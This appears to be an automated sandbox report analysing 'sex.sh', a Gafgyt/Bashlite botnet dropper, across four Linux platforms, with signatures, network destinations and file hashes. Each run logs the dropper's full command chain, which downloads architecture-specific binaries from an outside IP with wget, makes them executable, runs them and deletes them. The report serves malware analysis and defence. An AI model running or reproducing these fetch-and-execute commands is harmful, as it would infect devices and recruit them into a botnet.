Malware Analysis Report

2025-08-10 14:00

Sample ID 240804-qxyt6awfjn
Target sex.sh
SHA256 bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
Tags
gafgyt botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276

Threat Level: Known bad

The file sex.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet

Detected Gafgyt variant

Gafgyt/Bashlite

Executes dropped EXE

Changes its process name

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-08-04 13:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

4s

Max time network

131s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/arm61 /tmp/arm61 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm61 /usr/bin/wget N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
GB 89.187.167.4:443 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:42

Platform

debian9-armhf-20240611-en

Max time kernel

145s

Max time network

172s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/arm61 /tmp/arm61 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/arm61 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm61 /usr/bin/wget N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country Destination Domain Proto
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 5.252.177.70:23 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp
US 5.252.177.70:23 tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

memory/747-1-0xb66ba000-0xb66cb044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

debian9-mipsbe-20240611-en

Max time kernel

13s

Max time network

15s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/arm61 /tmp/arm61 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm61 /usr/bin/wget N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country Destination Domain Proto
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

debian9-mipsel-20240418-en

Max time kernel

13s

Max time network

15s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/arm61 /tmp/arm61 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm61 /usr/bin/wget N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country Destination Domain Proto
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp
US 216.172.177.16:80 216.172.177.16 tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c